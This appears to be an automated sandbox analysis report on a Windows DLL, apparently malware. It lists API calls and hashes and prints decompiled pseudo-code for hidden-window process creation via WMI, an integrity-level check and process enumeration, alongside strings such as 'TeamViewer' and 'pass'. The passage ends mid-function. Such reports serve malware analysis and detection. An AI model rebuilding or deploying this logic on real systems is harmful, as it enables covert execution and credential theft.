                                                                                                                        0x6f338b50
                                                                                                                        0x6f338b55
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b80
                                                                                                                        0x6f338b82
                                                                                                                        0x6f338b85
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b9b
                                                                                                                        0x6f338b9d
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8a
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b5e
                                                                                                                        0x00000000
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b69
                                                                                                                        0x6f338b6b
                                                                                                                        0x6f338b71
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b5e
                                                                                                                        0x6f338bac
                                                                                                                        0x6f338bad
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb8
                                                                                                                        0x6f338bba
                                                                                                                        0x6f338bbf
                                                                                                                        0x6f338bc4
                                                                                                                        0x6f338bcd
                                                                                                                        0x6f338bd2
                                                                                                                        0x6f338bd7
                                                                                                                        0x6f338bdd
                                                                                                                        0x6f338be6
                                                                                                                        0x6f338bf4
                                                                                                                        0x6f338c01
                                                                                                                        0x6f338c08
                                                                                                                        0x6f338c0c
                                                                                                                        0x6f338c12
                                                                                                                        0x6f338c1c
                                                                                                                        0x6f338c22
                                                                                                                        0x6f338c2f
                                                                                                                        0x6f338c34
                                                                                                                        0x6f338c3c
                                                                                                                        0x6f338c4a
                                                                                                                        0x6f338c4c
                                                                                                                        0x6f338c51
                                                                                                                        0x6f338c53
                                                                                                                        0x6f338c59
                                                                                                                        0x6f338c5a
                                                                                                                        0x6f338c5b
                                                                                                                        0x6f338c63
                                                                                                                        0x6f338c67
                                                                                                                        0x6f338c6b
                                                                                                                        0x6f338c6f
                                                                                                                        0x6f338c74
                                                                                                                        0x6f338c78
                                                                                                                        0x6f338c7d
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c92
                                                                                                                        0x6f338c97
                                                                                                                        0x6f338c9d
                                                                                                                        0x6f338cae
                                                                                                                        0x6f338cb4
                                                                                                                        0x6f338cc0
                                                                                                                        0x6f338cce
                                                                                                                        0x6f338cd4
                                                                                                                        0x6f338ce0
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338cee
                                                                                                                        0x6f338cf6
                                                                                                                        0x6f338cf7
                                                                                                                        0x6f338d01
                                                                                                                        0x6f338d19
                                                                                                                        0x6f338d20
                                                                                                                        0x6f338d27
                                                                                                                        0x6f338d2e
                                                                                                                        0x6f338d4e
                                                                                                                        0x6f338d43

                                                                                                                        APIs
                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6F338537
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6F33853E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F33855A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F338563
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F338570
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33857B
                                                                                                                        • PathAddBackslashA.SHLWAPI(00996628), ref: 6F33858E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F338597
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33859A
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6F3385AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F3385C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3385C4
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,009953A0,00000033), ref: 6F3385DA
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(009953A0), ref: 6F3385FB
                                                                                                                        • PathAddBackslashA.SHLWAPI(009953A0), ref: 6F338608
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(009953A0), ref: 6F338610
                                                                                                                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6F338637
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F33864D
                                                                                                                        • wsprintfA.USER32 ref: 6F338684
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,%s%s,?,?), ref: 6F33869B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3386A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00996628), ref: 6F3394EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3394F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009953A0), ref: 6F3394FE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339501
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00996738), ref: 6F33950E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339511
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009954B0), ref: 6F33951E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339521
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009773E8), ref: 6F33952E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339531
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00997378), ref: 6F33953E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339541
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098A1A0), ref: 6F33954E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339551
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099B7A8), ref: 6F33955E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339561
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099EC68), ref: 6F33956E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339571
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099B258), ref: 6F33957E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00977288), ref: 6F33958E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339591
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099D818), ref: 6F33959E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3395A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$.odt$15.0.$8?x$PBx$TeamViewer$\dx$ar.j$gd$h2$pass$pg$s$t$tx$word
                                                                                                                        • API String ID: 566710939-4171022235
                                                                                                                        • Opcode ID: 37a1d195b5df7c821955254ab1f47c053baa0b3a03710874f52666ca073924b3
                                                                                                                        • Instruction ID: f999455c21c1daccb96a09235b66c358848c5818597b540dc9325df1b255b9fb
                                                                                                                        • Opcode Fuzzy Hash: 37a1d195b5df7c821955254ab1f47c053baa0b3a03710874f52666ca073924b3
                                                                                                                        • Instruction Fuzzy Hash: 6BA2AEF2A08794AFDB20EF64CC84A9BBBEDEB95320F00591DF59997240DB349454CF62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 45%
                                                                                                                        			E6F3329D0() {
                                                                                                                        				intOrPtr _v56;
                                                                                                                        				void* _v76;
                                                                                                                        				intOrPtr* _v100;
                                                                                                                        				long _v116;
                                                                                                                        				char _v120;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				intOrPtr _v160;
                                                                                                                        				intOrPtr _v168;
                                                                                                                        				long _v176;
                                                                                                                        				char _v180;
                                                                                                                        				intOrPtr* _v192;
                                                                                                                        				intOrPtr* _v196;
                                                                                                                        				intOrPtr _v204;
                                                                                                                        				char _v208;
                                                                                                                        				char _v212;
                                                                                                                        				intOrPtr* _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				intOrPtr* _v236;
                                                                                                                        				intOrPtr* _v240;
                                                                                                                        				void* _v248;
                                                                                                                        				intOrPtr* _v252;
                                                                                                                        				intOrPtr _v256;
                                                                                                                        				intOrPtr* _v264;
                                                                                                                        				intOrPtr* _v272;
                                                                                                                        				long _v276;
                                                                                                                        				char _v280;
                                                                                                                        				short _v284;
                                                                                                                        				char _v288;
                                                                                                                        				short _v292;
                                                                                                                        				intOrPtr* _v300;
                                                                                                                        				intOrPtr* _v304;
                                                                                                                        				void* _v308;
                                                                                                                        				void* _v312;
                                                                                                                        				char _v316;
                                                                                                                        				intOrPtr* _v324;
                                                                                                                        				intOrPtr* _v336;
                                                                                                                        				long _v352;
                                                                                                                        				char _v356;
                                                                                                                        				intOrPtr* _v360;
                                                                                                                        				intOrPtr _v376;
                                                                                                                        				intOrPtr* _v380;
                                                                                                                        				intOrPtr _v384;
                                                                                                                        				intOrPtr _v392;
                                                                                                                        				intOrPtr* _v396;
                                                                                                                        				char* _t83;
                                                                                                                        				void* _t85;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				intOrPtr* _t88;
                                                                                                                        				intOrPtr _t91;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				intOrPtr _t94;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				intOrPtr* _t99;
                                                                                                                        				void* _t101;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				void* _t106;
                                                                                                                        				intOrPtr* _t107;
                                                                                                                        				intOrPtr* _t110;
                                                                                                                        				intOrPtr* _t113;
                                                                                                                        				void* _t115;
                                                                                                                        				intOrPtr* _t116;
                                                                                                                        				intOrPtr* _t118;
                                                                                                                        				intOrPtr* _t121;
                                                                                                                        				intOrPtr* _t124;
                                                                                                                        				short _t127;
                                                                                                                        				intOrPtr* _t132;
                                                                                                                        				intOrPtr* _t137;
                                                                                                                        				void* _t139;
                                                                                                                        				intOrPtr* _t140;
                                                                                                                        				intOrPtr _t142;
                                                                                                                        				intOrPtr* _t145;
                                                                                                                        				void* _t148;
                                                                                                                        				intOrPtr* _t151;
                                                                                                                        				void* _t153;
                                                                                                                        				intOrPtr* _t154;
                                                                                                                        				short _t157;
                                                                                                                        				char _t158;
                                                                                                                        				void* _t208;
                                                                                                                        				intOrPtr _t211;
                                                                                                                        				intOrPtr* _t212;
                                                                                                                        				void* _t213;
                                                                                                                        				void* _t215;
                                                                                                                        				void* _t216;
                                                                                                                        				void* _t217;
                                                                                                                        				void* _t218;
                                                                                                                        				intOrPtr* _t219;
                                                                                                                        				void* _t220;
                                                                                                                        
                                                                                                                        				_v56 = 0;
                                                                                                                        				__imp__CoInitializeEx(0, 6); // executed
                                                                                                                        				_t83 =  &_v76;
                                                                                                                        				_v76 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33df9c, 0, 1, 0x6f33decc, _t83); // executed
                                                                                                                        				if(_t83 < 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x787680
                                                                                                                        					_t154 = __imp__#2;
                                                                                                                        					_v116 = 0;
                                                                                                                        					_t85 =  *_t154(_t158, _t208, _t153);
                                                                                                                        					_t215 = _t85;
                                                                                                                        					_t86 = _v100;
                                                                                                                        					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120); // executed
                                                                                                                        					__imp__#6(_t215);
                                                                                                                        					if(_t87 >= 0) {
                                                                                                                        						_t91 = _v160;
                                                                                                                        						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                        						if(_t91 >= 0) {
                                                                                                                        							_v176 = 0;
                                                                                                                        							_t94 =  *_t154(L"Win32_Process");
                                                                                                                        							_t211 = _t94;
                                                                                                                        							_t95 = _v196;
                                                                                                                        							_v168 = _t211;
                                                                                                                        							_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))(_t95, _t211, 0, 0,  &_v180, 0); // executed
                                                                                                                        							if(_t97 >= 0) {
                                                                                                                        								_v208 = 0;
                                                                                                                        								_t98 =  *_t154(L"Win32_ProcessStartup");
                                                                                                                        								_t216 = _t98;
                                                                                                                        								_t99 = _v224;
                                                                                                                        								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
                                                                                                                        								__imp__#6(_t216);
                                                                                                                        								if(_t101 >= 0) {
                                                                                                                        									_t104 = _v240;
                                                                                                                        									_v248 = 0;
                                                                                                                        									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))(_t104, 0,  &_v248); // executed
                                                                                                                        									if(_t106 >= 0) {
                                                                                                                        										_t212 = __imp__#8;
                                                                                                                        										 *_t212( &_v208);
                                                                                                                        										_t110 = _v264;
                                                                                                                        										_v212 = 2;
                                                                                                                        										_v204 = 1;
                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0); // executed
                                                                                                                        										_t113 = _v272;
                                                                                                                        										_v280 = 0;
                                                                                                                        										_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))(_t113, L"Create", 0,  &_v280, 0); // executed
                                                                                                                        										if(_t115 >= 0) {
                                                                                                                        											_t118 = _v300;
                                                                                                                        											_push( &_v312);
                                                                                                                        											_v312 = 0;
                                                                                                                        											_push(0);
                                                                                                                        											_push(_t118);
                                                                                                                        											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
                                                                                                                        												_t217 = E6F33A360(_v228, 0, 0);
                                                                                                                        												if(_t217 != 0) {
                                                                                                                        													_t127 = lstrlenW(_t217) + 2;
                                                                                                                        													__imp__#4(_t217, _t127);
                                                                                                                        													_t157 = _t127;
                                                                                                                        													HeapFree(GetProcessHeap(), 0, _t217);
                                                                                                                        													if(_t157 != 0) {
                                                                                                                        														 *_t212( &_v288);
                                                                                                                        														_v292 = 8;
                                                                                                                        														_t132 = _v336;
                                                                                                                        														_v284 = _t157;
                                                                                                                        														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
                                                                                                                        														_t135 = _v256;
                                                                                                                        														_t213 = 0;
                                                                                                                        														if(_v256 != 0) {
                                                                                                                        															_t148 = E6F33A360(_t135, 0, 0);
                                                                                                                        															_t220 = _t148;
                                                                                                                        															if(_t220 != 0) {
                                                                                                                        																__imp__#2(_t220);
                                                                                                                        																_t213 = _t148;
                                                                                                                        																if(_t213 != 0) {
                                                                                                                        																	_t151 = _v360;
                                                                                                                        																	_v316 = 8;
                                                                                                                        																	_v308 = _t213;
                                                                                                                        																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
                                                                                                                        																}
                                                                                                                        																HeapFree(GetProcessHeap(), 0, _t220);
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        														__imp__#8( &_v280);
                                                                                                                        														_t137 = _v360;
                                                                                                                        														_v276 = _v352;
                                                                                                                        														_v284 = 9;
                                                                                                                        														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0); // executed
                                                                                                                        														_v352 = 0;
                                                                                                                        														__imp__#2(L"Create");
                                                                                                                        														_t218 = _t139;
                                                                                                                        														_t140 = _v380;
                                                                                                                        														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
                                                                                                                        														_t219 = __imp__#6;
                                                                                                                        														_v376 = _t142;
                                                                                                                        														 *_t219(_t218);
                                                                                                                        														 *_t219(_t157);
                                                                                                                        														if(_t213 != 0) {
                                                                                                                        															 *_t219(_t213);
                                                                                                                        														}
                                                                                                                        														if(_v384 >= 0) {
                                                                                                                        															_t145 = _v396;
                                                                                                                        															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
                                                                                                                        															_v392 = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												_t124 = _v324;
                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
                                                                                                                        											}
                                                                                                                        											_t121 = _v312;
                                                                                                                        											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
                                                                                                                        										}
                                                                                                                        										_t116 = _v304;
                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
                                                                                                                        										_t211 = _v284;
                                                                                                                        									}
                                                                                                                        									_t107 = _v252;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
                                                                                                                        								}
                                                                                                                        								_t102 = _v236;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
                                                                                                                        							}
                                                                                                                        							__imp__#6(_t211);
                                                                                                                        						}
                                                                                                                        						_t92 = _v192;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
                                                                                                                        					}
                                                                                                                        					_t88 = _v140;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
                                                                                                                        					return _v132;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F3329E0
                                                                                                                        • CoCreateInstance.OLE32(6F33DF9C,00000000,00000001,6F33DECC,?), ref: 6F3329FC
                                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 6F332A1D
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332A3C
                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6F332A59
                                                                                                                        • SysAllocString.OLEAUT32(Win32_Process), ref: 6F332A70
                                                                                                                        • SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6F332A9E
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332ABA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332AF1
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 6F332B79
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6F332B84
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332B8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332B95
                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 6F332BAA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332BB5
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 6F332BF9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332C2D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332C34
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332C3F
                                                                                                                        • SysAllocString.OLEAUT32(Create), ref: 6F332C78
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAD
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CB4
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332D11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                                        • String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
                                                                                                                        • API String ID: 2088563290-1030916257
                                                                                                                        • Opcode ID: 7577d729d9d4b55e9dea5f143240a1e8f47c072405206789162613ba5c2eddbe
                                                                                                                        • Instruction ID: 9e2a923334f07d0e7d1ddaf3872355eef9182f973ed0f6f95c5417562070ed61
                                                                                                                        • Opcode Fuzzy Hash: 7577d729d9d4b55e9dea5f143240a1e8f47c072405206789162613ba5c2eddbe
                                                                                                                        • Instruction Fuzzy Hash: 83B10572A04359AFC710DFA9C884D6BBBEEFFC9654F10890DF549C7210DA35E9018BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F333390() {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				short _v12;
                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				void* _v24;
                                                                                                                        				long _v28;
                                                                                                                        				int _t25;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t56;
                                                                                                                        
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v20 = 0;
                                                                                                                        				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_v24 = 0;
                                                                                                                        					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
                                                                                                                        					if(_t25 == 0 && GetLastError() == 0x7a) {
                                                                                                                        						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
                                                                                                                        						if(_t56 != 0) {
                                                                                                                        							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
                                                                                                                        							if(_t33 != 0) {
                                                                                                                        								_v16.Value = 0;
                                                                                                                        								_v12 = 0x500;
                                                                                                                        								_v24 = 0;
                                                                                                                        								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                        									if(EqualSid( *_t56, _v24) == 0) {
                                                                                                                        										_push(_v4);
                                                                                                                        										_push( *_t56);
                                                                                                                        										L6F33C384();
                                                                                                                        									} else {
                                                                                                                        										_v20 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								FreeSid(_v24);
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t56);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v24);
                                                                                                                        					return _v16.Value;
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6F3333AA
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6F3333D1
                                                                                                                        • GetLastError.KERNEL32 ref: 6F3333DB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F3333F8
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3333FB
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6F33341D
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 6F333447
                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 6F333459
                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6F333475
                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 6F33347F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333487
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33348A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333496
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1769087308-0
                                                                                                                        • Opcode ID: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction ID: ee59c0d063054639add101dd8ae4767c52a57c19788051e63e56da3003cdff7a
                                                                                                                        • Opcode Fuzzy Hash: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction Fuzzy Hash: 7F314DB2608355AFD710DF65CC89D5BBBADEF85760F00891DF994C2140D775E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B0A0(long* __esi) {
                                                                                                                        				long _t27;
                                                                                                                        				int _t28;
                                                                                                                        				long _t29;
                                                                                                                        				void _t31;
                                                                                                                        				long _t34;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t40;
                                                                                                                        				long _t44;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t55;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				long* _t58;
                                                                                                                        				void* _t60;
                                                                                                                        				long* _t62;
                                                                                                                        
                                                                                                                        				_t58 = __esi;
                                                                                                                        				_t62[4] = 0;
                                                                                                                        				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
                                                                                                                        				if(_t27 == 0xc0000004) {
                                                                                                                        					_t27 =  *_t62;
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
                                                                                                                        						_t55 = _t28;
                                                                                                                        						_t62[3] = _t55;
                                                                                                                        						if(_t55 == 0) {
                                                                                                                        							L23:
                                                                                                                        							return _t28;
                                                                                                                        						}
                                                                                                                        						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
                                                                                                                        						if(_t29 < 0 || _t62[1] <= 0) {
                                                                                                                        							L22:
